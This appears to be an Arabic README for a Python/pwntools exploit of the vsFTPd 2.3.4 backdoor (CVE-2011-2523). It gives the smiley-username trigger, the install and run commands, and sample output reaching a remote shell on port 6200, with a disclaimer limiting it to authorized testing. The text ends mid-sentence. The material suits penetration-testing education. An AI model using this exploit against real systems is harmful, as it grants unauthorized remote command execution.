
استغلال Python لثغرة الباب الخلفي في vsFTPd 2.3.4 (CVE-2011-2523) الذي يشغّل شل مخفي على المنفذ 6200 عبر اسم مستخدم مصمّم خصيصًا، مما يتيح تنفيذ الأوامر عن بُعد لاختبار الاختراق المصرح به.
يوضح هذا المشروع استغلال ثغرة الباب الخلفي في vsFTPd 2.3.4 (CVE-2011-2523) باستخدام Python وpwntools.
إخلاء مسؤولية: هذا المشروع مخصص للأغراض التعليمية واختبار الاختراق المصرح به فقط. لا تستخدمه ضد أنظمة دون إذن.
👉 يحتوي الإصدار المعرّض للثغرة من vsFTPd على باب خلفي خبيث يتم تفعيله عند استخدام اسم مستخدم يحتوي على :) أثناء تسجيل الدخول.
vsFTPd 2.3.4USER hello:))pwntoolsثبّت التبعيات:
pip install pwntools
python3 exploit.py <TARGET_IP>
python3 exploit.py <TARGET_IP> <PORT>
python3 exploit.py 192.168.190.140
[+] Checking FTP Version...
[+] Triggering backdoor...
[+] Connecting to backdoor....
[+] Got Shell
$
يجب أن يكون الهدف مشغّلاً vsFTPd 2.3.4 (الإصدار المعرّض للثغرة)
يجب أن يكون المنفذ 6200 قابلاً للوصول
يعمل بشكل أفضل في بيئات المختبرات مثل: